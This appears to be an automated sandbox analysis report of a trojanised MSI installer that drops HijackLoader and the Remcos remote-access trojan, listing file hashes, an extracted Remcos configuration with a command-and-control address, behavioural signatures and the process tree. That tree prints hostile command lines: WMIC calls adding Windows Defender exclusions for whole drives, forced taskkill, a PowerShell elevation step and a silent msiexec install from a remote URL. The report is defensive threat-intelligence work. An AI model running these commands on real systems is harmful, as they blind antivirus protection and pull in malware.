Analysis
-
max time kernel
148s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2024 09:58
Static task
static1
Behavioral task
behavioral1
Sample
LauncherPred8.3.37Stablesetup.msi
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
LauncherPred8.3.37Stablesetup.msi
Resource
win10v2004-20241007-en
General
-
Target
LauncherPred8.3.37Stablesetup.msi
-
Size
11.4MB
-
MD5
c628123d2539f5ae51b37a06bd179fc7
-
SHA1
139dfe6164e7c6ba6e2360673cf75801fd2add36
-
SHA256
f5dfa6b5d19d9334c69d24dd98f13cb30badacb6403b03afc47af4e267cbe0c2
-
SHA512
3cc3af8065b138719bae90720aeb37b15bb9412631aba972dab1d8d42e7507fd1d4ba231c96a0fe4b32b67e450594a95fe6d0fbc858bf2018b02b6d83ccda567
-
SSDEEP
196608:oEGAvNE+MNqCjsict52JykNWmKoahv02bfHJNeh5XK3zQlstPGaVB4L0iJP:QCBAK5XmooaBYhtKklkG
Malware Config
Extracted
remcos
v2
185.157.162.126:1995
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
qsdazeazd-EL00KX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\audiogram.tif family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Hijackloader family
-
Remcos family
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 3864 msiexec.exe -
Blocklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 20 3220 msiexec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exewscript.execscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation cscript.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
EHttpSrv.execmd.exedescription pid process target process PID 1880 set thread context of 1696 1880 EHttpSrv.exe cmd.exe PID 1696 set thread context of 4020 1696 cmd.exe EHttpSrv.exe -
Drops file in Program Files directory 9 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files (x86)\sev\dev\updt\VisualStudioSetup.exe msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\task.vbs msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\ScreenRec_webinstall_all.exe msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\npp.8.4.2.Installer.x64.exe msiexec.exe File created C:\Program Files (x86)\sev\dev\ScreenRec_webinstall_all.exe msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\lola.bat msiexec.exe File created C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs msiexec.exe File created C:\Program Files (x86)\sev\dev\Firefox Installer.exe msiexec.exe -
Drops file in Windows directory 22 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process File opened for modification C:\Windows\Installer\MSI8A30.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{9A85933A-E1A1-4421-ACF9-F9A12BFF4DF0} msiexec.exe File opened for modification C:\Windows\Installer\MSIC8DF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC99B.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\e57880c.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSICA19.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\e57880c.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIBFE5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICA78.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8AFD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8ABD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8B4C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8C18.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICB44.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8899.tmp msiexec.exe -
Executes dropped EXE 1 IoCs
Processes:
EHttpSrv.exepid process 1880 EHttpSrv.exe -
Loads dropped DLL 12 IoCs
Processes:
MsiExec.exeMsiExec.exeEHttpSrv.exeEHttpSrv.exepid process 1188 MsiExec.exe 1188 MsiExec.exe 1188 MsiExec.exe 1188 MsiExec.exe 1188 MsiExec.exe 2932 MsiExec.exe 2932 MsiExec.exe 2932 MsiExec.exe 2932 MsiExec.exe 1880 EHttpSrv.exe 1880 EHttpSrv.exe 4020 EHttpSrv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MsiExec.exeMsiExec.exeEHttpSrv.execmd.exeEHttpSrv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EHttpSrv.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 4300 timeout.exe 2152 timeout.exe 3864 timeout.exe 4792 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1172 taskkill.exe 4256 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
msiexec.exepowershell.exemsiexec.exeEHttpSrv.execmd.exepid process 4416 msiexec.exe 4416 msiexec.exe 3708 powershell.exe 3708 powershell.exe 3220 msiexec.exe 3220 msiexec.exe 1880 EHttpSrv.exe 1696 cmd.exe 1696 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
EHttpSrv.execmd.exepid process 1880 EHttpSrv.exe 1696 cmd.exe 1696 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exepowershell.exeWMIC.exedescription pid process Token: SeShutdownPrivilege 4000 msiexec.exe Token: SeIncreaseQuotaPrivilege 4000 msiexec.exe Token: SeSecurityPrivilege 4416 msiexec.exe Token: SeCreateTokenPrivilege 4000 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4000 msiexec.exe Token: SeLockMemoryPrivilege 4000 msiexec.exe Token: SeIncreaseQuotaPrivilege 4000 msiexec.exe Token: SeMachineAccountPrivilege 4000 msiexec.exe Token: SeTcbPrivilege 4000 msiexec.exe Token: SeSecurityPrivilege 4000 msiexec.exe Token: SeTakeOwnershipPrivilege 4000 msiexec.exe Token: SeLoadDriverPrivilege 4000 msiexec.exe Token: SeSystemProfilePrivilege 4000 msiexec.exe Token: SeSystemtimePrivilege 4000 msiexec.exe Token: SeProfSingleProcessPrivilege 4000 msiexec.exe Token: SeIncBasePriorityPrivilege 4000 msiexec.exe Token: SeCreatePagefilePrivilege 4000 msiexec.exe Token: SeCreatePermanentPrivilege 4000 msiexec.exe Token: SeBackupPrivilege 4000 msiexec.exe Token: SeRestorePrivilege 4000 msiexec.exe Token: SeShutdownPrivilege 4000 msiexec.exe Token: SeDebugPrivilege 4000 msiexec.exe Token: SeAuditPrivilege 4000 msiexec.exe Token: SeSystemEnvironmentPrivilege 4000 msiexec.exe Token: SeChangeNotifyPrivilege 4000 msiexec.exe Token: SeRemoteShutdownPrivilege 4000 msiexec.exe Token: SeUndockPrivilege 4000 msiexec.exe Token: SeSyncAgentPrivilege 4000 msiexec.exe Token: SeEnableDelegationPrivilege 4000 msiexec.exe Token: SeManageVolumePrivilege 4000 msiexec.exe Token: SeImpersonatePrivilege 4000 msiexec.exe Token: SeCreateGlobalPrivilege 4000 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeRestorePrivilege 4416 msiexec.exe Token: SeTakeOwnershipPrivilege 4416 msiexec.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeIncreaseQuotaPrivilege 4084 WMIC.exe Token: SeSecurityPrivilege 4084 WMIC.exe Token: SeTakeOwnershipPrivilege 4084 WMIC.exe Token: SeLoadDriverPrivilege 4084 WMIC.exe Token: SeSystemProfilePrivilege 4084 WMIC.exe Token: SeSystemtimePrivilege 4084 WMIC.exe Token: SeProfSingleProcessPrivilege 4084 WMIC.exe Token: SeIncBasePriorityPrivilege 4084 WMIC.exe Token: SeCreatePagefilePrivilege 4084 WMIC.exe Token: SeBackupPrivilege 4084 WMIC.exe Token: SeRestorePrivilege 4084 WMIC.exe Token: SeShutdownPrivilege 4084 WMIC.exe Token: SeDebugPrivilege 4084 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
msiexec.exepid process 4000 msiexec.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
msiexec.execmd.execscript.exepowershell.exewscript.execmd.execmd.execmd.execmd.exewscript.exemsiexec.exeEHttpSrv.execmd.exedescription pid process target process PID 4416 wrote to memory of 1188 4416 msiexec.exe MsiExec.exe PID 4416 wrote to memory of 1188 4416 msiexec.exe MsiExec.exe PID 4416 wrote to memory of 1188 4416 msiexec.exe MsiExec.exe PID 4416 wrote to memory of 4484 4416 msiexec.exe cmd.exe PID 4416 wrote to memory of 4484 4416 msiexec.exe cmd.exe PID 4484 wrote to memory of 4380 4484 cmd.exe chcp.com PID 4484 wrote to memory of 4380 4484 cmd.exe chcp.com PID 4484 wrote to memory of 4300 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 4300 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 2152 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 2152 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 3864 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 3864 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 1924 4484 cmd.exe cscript.exe PID 4484 wrote to memory of 1924 4484 cmd.exe cscript.exe PID 1924 wrote to memory of 3708 1924 cscript.exe powershell.exe PID 1924 wrote to memory of 3708 1924 cscript.exe powershell.exe PID 4484 wrote to memory of 4792 4484 cmd.exe timeout.exe PID 4484 wrote to memory of 4792 4484 cmd.exe timeout.exe PID 3708 wrote to memory of 2548 3708 powershell.exe wscript.exe PID 3708 wrote to memory of 2548 3708 powershell.exe wscript.exe PID 2548 wrote to memory of 1996 2548 wscript.exe cmd.exe PID 2548 wrote to memory of 1996 2548 wscript.exe cmd.exe PID 1996 wrote to memory of 4084 1996 cmd.exe WMIC.exe PID 1996 wrote to memory of 4084 1996 cmd.exe WMIC.exe PID 2548 wrote to memory of 1068 2548 wscript.exe cmd.exe PID 2548 wrote to memory of 1068 2548 wscript.exe cmd.exe PID 1068 wrote to memory of 3872 1068 cmd.exe WMIC.exe PID 1068 wrote to memory of 3872 1068 cmd.exe WMIC.exe PID 2548 wrote to memory of 3828 2548 wscript.exe cmd.exe PID 2548 wrote to memory of 3828 2548 wscript.exe cmd.exe PID 3828 wrote to memory of 1172 3828 cmd.exe taskkill.exe PID 3828 wrote to memory of 1172 3828 cmd.exe taskkill.exe PID 2548 wrote to memory of 2208 2548 wscript.exe cmd.exe PID 2548 wrote to memory of 2208 2548 wscript.exe cmd.exe PID 2208 wrote to memory of 4256 2208 cmd.exe taskkill.exe PID 2208 wrote to memory of 4256 2208 cmd.exe taskkill.exe PID 2548 wrote to memory of 4632 2548 wscript.exe cmd.exe PID 2548 wrote to memory of 4632 2548 wscript.exe cmd.exe PID 2548 wrote to memory of 4536 2548 wscript.exe wscript.exe PID 2548 wrote to memory of 4536 2548 wscript.exe wscript.exe PID 4536 wrote to memory of 3864 4536 wscript.exe msiexec.exe PID 4536 wrote to memory of 3864 4536 wscript.exe msiexec.exe PID 3220 wrote to memory of 2932 3220 msiexec.exe MsiExec.exe PID 3220 wrote to memory of 2932 3220 msiexec.exe MsiExec.exe PID 3220 wrote to memory of 2932 3220 msiexec.exe MsiExec.exe PID 3220 wrote to memory of 1880 3220 msiexec.exe EHttpSrv.exe PID 3220 wrote to memory of 1880 3220 msiexec.exe EHttpSrv.exe PID 3220 wrote to memory of 1880 3220 msiexec.exe EHttpSrv.exe PID 1880 wrote to memory of 1696 1880 EHttpSrv.exe cmd.exe PID 1880 wrote to memory of 1696 1880 EHttpSrv.exe cmd.exe PID 1880 wrote to memory of 1696 1880 EHttpSrv.exe cmd.exe PID 1880 wrote to memory of 1696 1880 EHttpSrv.exe cmd.exe PID 1696 wrote to memory of 4020 1696 cmd.exe EHttpSrv.exe PID 1696 wrote to memory of 4020 1696 cmd.exe EHttpSrv.exe PID 1696 wrote to memory of 4020 1696 cmd.exe EHttpSrv.exe PID 1696 wrote to memory of 4020 1696 cmd.exe EHttpSrv.exe PID 1696 wrote to memory of 4020 1696 cmd.exe EHttpSrv.exe
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\LauncherPred8.3.37Stablesetup.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4000
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1EEE00877F3634C9835B80220747A2E32⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\sev\dev\updt\lola.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4380
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak3⤵
- Delays execution with timeout.exe
PID:4300
-
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak3⤵
- Delays execution with timeout.exe
PID:2152
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:3864
-
-
C:\Windows\system32\cscript.execscript //nologo "C:\Program Files (x86)\sev\dev\updt\runTaskAsAdmin.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process wscript.exe -ArgumentList '""C:\Program Files (x86)\sev\dev\updt\task.vbs""' -Verb runAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\task.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"6⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\Wbem\WMIC.exeWmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"6⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\Wbem\WMIC.exeWmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="F:\"7⤵PID:3872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im cmd.exe6⤵
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\taskkill.exetaskkill /f /im cmd.exe7⤵
- Kills process with taskkill
PID:1172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im msiexec.exe6⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\taskkill.exetaskkill /f /im msiexec.exe7⤵
- Kills process with taskkill
PID:4256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo Script started >> "C:\Users\root\Desktop\wix\log.txt"6⤵PID:4632
-
-
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Program Files (x86)\sev\dev\updt\secondaryTask.vbs" /b6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i https://gersgaming.s3.us-east-2.amazonaws.com/Slf.msi /qn7⤵
- Use of msiexec (install) with remote resource
PID:3864
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 60 /nobreak3⤵
- Delays execution with timeout.exe
PID:4792
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5E520A2768BB48B25E764A0769D81F7F2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\EHttpSrv.exe"C:\Users\Admin\AppData\Local\Temp\EHttpSrv.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\EHttpSrv.exeC:\Users\Admin\AppData\Local\Temp\EHttpSrv.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4020
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5db90a7e2b8a5afe31bfce4e5404d9732
SHA11a21316d014e0eb8c8fdfd22c91dca3b6af53284
SHA256a9184c7820d9199474c7eabe741a83f42b902f407830405503d25c311bbda943
SHA512bd8136a12bbdc4d0bfecae3487ad5df1fc43dedb19830cf23e96b79d3e56f53178d5bc8b253efe4a72ce09215941f7166cfd87e216ad06a3ad3e7142aa6d727f
-
Filesize
2KB
MD57aefb0dc1a227b77abca0c5d0675df8f
SHA1c3d0eafcd7645c5152aebf20b98b596822328508
SHA256ff0455ba424dbfcfccf87aa9eb1e5a5abb9006851934c435b51e56c31112b156
SHA51296a8410d3f888e2a72ea837064535cf8723a3043e71b68e335778f1d3549e6814defc9dee3a6a7561603b02d0c3f640cd57f890a02fd3379231b288fd606996a
-
Filesize
928B
MD5200bfb54cca80c3a3b50dd9c479d580b
SHA1b2ac137e8d188dd4a9b0ad5e329714e3e7f2bd7c
SHA25618aece804e2854d1aee6d3e289e8dfe9dcc832f67b84f47e4937aa41ed8250c7
SHA51298909b213290980013d584389af154ee890949850c97c9512014984e29d779f6e554413b3086b1986e11169e95edf8b019b04b4d7fd475adcffb83f7c3f7779c
-
Filesize
659B
MD594d85f8f350a1f6fe8e700b87f5b4eea
SHA10dc9e11c55b3e056eeadb9cfe6ef2b6bd98300ea
SHA256cb7294f1c425ad49aa0e487d36cfb580c303db25d1f69ea3fa08d81d29fc21ba
SHA5120226c2662e4d6d2f473f075e8d200d55a3b18deacb40365450866039dafeb206ed6ea9216149d1ac5f1a19e8f185381b796d7f4fa3bb08c4558b6b292838e9c5
-
Filesize
869B
MD58532766ca0ae0adf46849cc89d54486a
SHA17bba7004901617e97855ddd6d5cc81f7c95ee3e7
SHA256264b66a6d0b79faea0171a06441587cb910aaf815d7120ad2951fc7a5462dfcd
SHA5121e1e2d5c3f7a394efb524c5f7b093201e9f4a9483a8146e44896b34b3dffbb74b213b04a904be064e39ef782b0b357a50444673faa42466e8b43219959e06762
-
Filesize
2KB
MD5c8be5f9ad4d51e45019e4b7471281257
SHA10b6b9cc0495bc9f67ecf2299657b380b256f1611
SHA256d88e84ec97091ad59b8ce69b5c678e210514bde7f880f6e72367cefc35053c9c
SHA512bde94e0cf77a407a8cbd24c8f79d961c6858c336cac8a5809178f7f62bf2749fe75715ab69183855c98c1dae2936a949e215c6a775c48b2d73d76bcd9bce68ce
-
Filesize
1.0MB
MD57c16b71e315fe32cc60a4a3213e63160
SHA180f63c9d987927c7e459b8ccdbd84a1bbfa9b143
SHA25607031de4f51fbb090b4c706f8958ecc8f33bd240c058a2f78d433248e3946c7b
SHA51273cd1d61cfc006da8e25365172d685af2e5effe2cb4febddde0c9bd242d8af75ebcff1c364cef35f92698023fe8f6e415a0163f0d6d14c82b608d8c9c8ecf3c5
-
Filesize
20KB
MD59329ba45c8b97485926a171e34c2abb8
SHA120118bc0432b4e8b3660a4b038b20ca28f721e5c
SHA256effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659
SHA5120af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc
-
Filesize
48KB
MD51f700a39a6cd6ef7e7821d6540f8a0bf
SHA1135db8a774d234399a07ae1b7d5813aa9ca56cd9
SHA25699a831ca8c87013c0cb4487b37dd029893ba8d590aac03f54b30b6a63b99e95f
SHA512831555b1a803b61229b01e9e7a695f01464c2f99a000f054a3a0d4cef20df84ca1b2fa422699917bff3f73471d13d1fc2967d3b7fe5da527f938d5129aec3f3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
877KB
MD55124236fd955464317fbb1f344a1d2f2
SHA1fe3a91e252f1dc3c3b4980ade7157369ea6f5097
SHA256ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6
SHA5122b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252
-
Filesize
883KB
MD54366cd6c5d795811822b9ccc3df3eab4
SHA130f6050729b4c08b7657454cb79dd5a3d463c606
SHA25655497a3eced5d8d190400bcd1a4b43a304ebf74a0d6d098665474ed4b1b0e9da
SHA5124a56a2da7ded16125c2795d5760c7c08a93362536c9212cff3a31dbf6613cb3fca436efd77c256338f5134da955bc7ccc564b4af0c45ac0dfd645460b922a349
-
Filesize
1.0MB
MD5686b224b4987c22b153fbb545fee9657
SHA1684ee9f018fbb0bbf6ffa590f3782ba49d5d096c
SHA256a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36
SHA51244d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875
-
Filesize
557KB
MD52c9c51ac508570303c6d46c0571ea3a1
SHA1e3e0fe08fa11a43c8bca533f212bdf0704c726d5
SHA256ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550
